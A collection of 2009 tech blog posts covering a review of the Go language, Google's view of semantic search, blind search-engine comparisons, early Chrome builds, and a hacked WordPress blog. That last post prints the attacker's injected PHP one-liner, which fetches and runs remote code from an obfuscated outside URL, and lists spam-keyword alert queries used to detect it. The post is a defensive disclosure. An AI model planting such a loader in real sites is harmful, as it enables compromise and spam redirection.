November 12th, 2009
Mark Chu-Carroll is a Google software engineer who's written a long, detailed and informed review of Google's new programming language Go. It's worth a read if you are interested in understanding what Go is like as a programming language. Here are a few points that I took note of.
“The guys who designed Go were very focused on keeping things as small and simple as possible. When you look at it in contrast to a language like C++, it’s absolutely striking. Go is very small, and very simple. There’s no cruft. No redundancy. Everything has been pared down. But for the most part, they give you what you need. If you want a C-like language with some basic object-oriented features and garbage collection, Go is about as simple as you could realistically hope to get.”
“The most innovative thing about it is its type system. … It ends up giving you something with the flavor of Python-ish duck typing, but with full type-checking from the compiler.”
“Go programs compile really astonishingly quickly. When I first tried it, I thought that I had made a mistake building the compiler. It was just too damned fast. I’d never seen anything quite like it.”
“At the end of the day, what do I think? I like Go, but I don’t love it. If it had generics, it would definitely be my favorite of the C/C++/C#/Java family. It’s got a very elegant simplicity to it which I really like. The interface type system is wonderful. The overall structure of programs and modules is excellent. But it’s got some ugliness. … It’s not going to wipe C++ off the face of the earth. But I think it will establish itself as a solid alternative.”
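The "Python-ish duck typing, but with full type-checking" that Chu-Carroll singles out comes from Go's structural interfaces: a type satisfies an interface simply by having the right methods, with no explicit "implements" declaration. A minimal sketch (the types and names here are my own illustration, not from the review):

```go
package main

import "fmt"

// Speaker is satisfied by any type with a Speak() string method;
// no explicit declaration connects a type to this interface.
type Speaker interface {
	Speak() string
}

type Dog struct{}

func (d Dog) Speak() string { return "Woof" }

type Robot struct{ ID int }

func (r Robot) Speak() string { return fmt.Sprintf("Beep %d", r.ID) }

func main() {
	// Both Dog and Robot satisfy Speaker structurally, and the
	// compiler verifies it at build time: a missing method is a
	// compile error, not a runtime surprise as in Python.
	speakers := []Speaker{Dog{}, Robot{ID: 7}}
	for _, s := range speakers {
		fmt.Println(s.Speak())
	}
}
```

This is the flavor of duck typing with a compiler backstop: any future type that grows a `Speak() string` method can be dropped into the slice unchanged.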
Go sounds like a language that will help you grow as a computer scientist if you use it. That’s a good enough recommendation for me.
November 11th, 2009
PCWorld has a story, Google VP Mayer Describes the Perfect Search Engine, with some interesting comments on semantic search from Marissa Mayer, Google’s vice president of Search Products & User Experience.
“IDGNS: What’s the status of semantic search at Google? You have said in the past that through “brute force” — analyzing massive amounts of queries and Web content — Google’s engine can deliver results that make it seem as if it understood things semantically, when it really functions using other algorithmic approaches. Is that still the preferred approach?
Mayer: We believe in building intelligent systems that learn off of data in an automated way, [and then] tuning and refining them. When people talk about semantic search and the semantic Web, they usually mean something that is very manual, with maps of various associations between words and things like that. We think you can get to a much better level of understanding through pattern-matching data, building large-scale systems. That’s how the brain works. That’s why you have all these fuzzy connections, because the brain is constantly processing lots and lots of data all the time.
IDGNS: A couple of years ago or so, some experts were predicting that semantic technology would revolutionize search and blindside Google, but that hasn’t happened. It seems that semantic search efforts have hit a wall, especially because semantic engines are hard to scale.
Mayer: The problem is that language changes. Web pages change. How people express themselves changes. And all those things matter in terms of how well semantic search applies. That’s why it’s better to have an approach that’s based on machine learning and that changes, iterates and responds to the data. That’s a more robust approach. That’s not to say that semantic search has no part in search. It’s just that for us, we really prefer to focus on things that can scale. If we could come up with a semantic search solution that could scale, we would be very excited about that. For now, what we’re seeing is that a lot of our methods approximate the intelligence of semantic search but do it through other means.”
I interpret these comments to mean that Google’s management still views the concept of semantic search (and the Semantic Web) as involving better understanding of the intended meaning of text in documents and queries. The W3C’s web of data model is still not on their radar.
June 7th, 2009
Who’s got the best basic web search engine? One way to approach that question is to conduct an experiment in which subjects rank the results returned by several engines without knowing which is which.
BlindSearch is a simple and neat site that collects ‘objective’ opinions on search quality by showing query results from Google, Yahoo and Bing side by side without identifying which is which and inviting you to select the best.
“Type in a search query above, hit search then vote for the column which you believe best matches your query. The columns are randomised with every query.
The goal of this site is simple, we want to see what happens when you remove the branding from search engines. How differently will you perceive the results?”
As of this writing there have been 1,679 votes for preferred results, with Google getting 39%, Bing 39% and Yahoo 22%.
Update 2:14pm EDT 6/7: Google: 45%, Bing: 32%, Yahoo: 22% | 11,130 votes
June 5th, 2009
How's this for truth in advertising? The Chromium blog announces early developer channel versions of Google Chrome for Mac OS X and Linux, but warns people not to try them in a post titled Danger: Mac and Linux builds available.
“In order to get more feedback from developers, we have early developer channel versions of Google Chrome for Mac OS X and Linux, but whatever you do, please DON’T DOWNLOAD THEM! Unless of course you are a developer or take great pleasure in incomplete, unpredictable, and potentially crashing software. How incomplete? So incomplete that, among other things, you won’t yet be able to view YouTube videos, change your privacy settings, set your default search provider, or even print.”
Of course, they know that this will make trying them irresistible to some of us. If that includes you, go get the Mac or Linux version.
May 21st, 2009
Yesterday we discovered that our ebiquity blog had been hacked. It looks like a vulnerability in our old WordPress installation was exploited to add the following code to the top of our blog’s main page.
<?php $site = create_function('','$cachedir="/tmp/"; $param="qq"; $key=$_GET[$param]; $rand="1239aef"; $said=23; $type=1; $stprot="http://blogwp.info"; '.file_get_contents(strrev("txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"))); $site(); ?>
This code caused URLs like https://ebiquity.umbc.edu/?qq=1671 to redirect to a spam page. We’ve upgraded the blog to the latest WordPress release, which hopefully will prevent this exploit from being used again. (Notice the reversed URL — LOL!)
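The reversed string is a simple obfuscation trick: `file_get_contents(strrev(...))` keeps the payload URL from showing up in a casual grep of the source. A quick sketch of the same reversal (written in Go rather than the attacker's PHP) shows what the injected code actually fetched:

```go
package main

import "fmt"

// reverse returns s with its bytes in reverse order; the obfuscated
// string here is plain ASCII, so byte-wise reversal is safe.
func reverse(s string) string {
	b := []byte(s)
	for i, j := 0, len(b)-1; i < j; i, j = i+1, j-1 {
		b[i], b[j] = b[j], b[i]
	}
	return string(b)
}

func main() {
	obfuscated := "txt.mrahp/elpmaxe/deliated/ofni.pwgolb//:ptth"
	// Reversing recovers the hidden payload URL.
	fmt.Println(reverse(obfuscated))
	// → http://blogwp.info/detailed/example/pharm.txt
}
```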
We discovered the problem through a clever trick I read about last year on a site I've forgotten (maybe here). We created several Google alerts triggered by the appearance of spam-related words on pages apparently hosted by ebiquity.umbc.edu. For example:
- adult OR girls OR sex OR sexx OR XXX OR porn OR pornography site:ebiquity.umbc.edu
- viagra OR cialis OR levitra OR Phentermine OR Xanax site:ebiquity.umbc.edu
I would get several false positives a month from these alerts triggered by non-spam entries on our site. In fact, *this* post will generate a false positive. But yesterday I got a true positive. Looking at the log files, I think I got the alert within a few hours of when our blog was hacked. So I am happy to say that this worked and worked well. Without this alert, it might have taken weeks to notice the problem.
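The same keyword check the alerts perform can also be run locally against your own pages, which catches an injection even before Google re-crawls the site. A minimal sketch (the term list mirrors the alert queries above; the sample page is hypothetical):

```go
package main

import (
	"fmt"
	"strings"
)

// spamTerms mirrors the keywords used in the Google Alerts above.
var spamTerms = []string{"viagra", "cialis", "levitra", "phentermine", "xanax"}

// flagSpam returns the spam terms that appear in a page body,
// matched case-insensitively.
func flagSpam(body string) []string {
	lower := strings.ToLower(body)
	var hits []string
	for _, t := range spamTerms {
		if strings.Contains(lower, t) {
			hits = append(hits, t)
		}
	}
	return hits
}

func main() {
	page := "<html>Buy cheap VIAGRA and Xanax here</html>"
	fmt.Println(flagSpam(page)) // reports which spam terms were found
}
```

Like the alerts, this will produce false positives on legitimate mentions of the terms (such as this post), so the hits need a human look before acting on them.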
The results of this Google search reveal many compromised blogs from the .edu domain.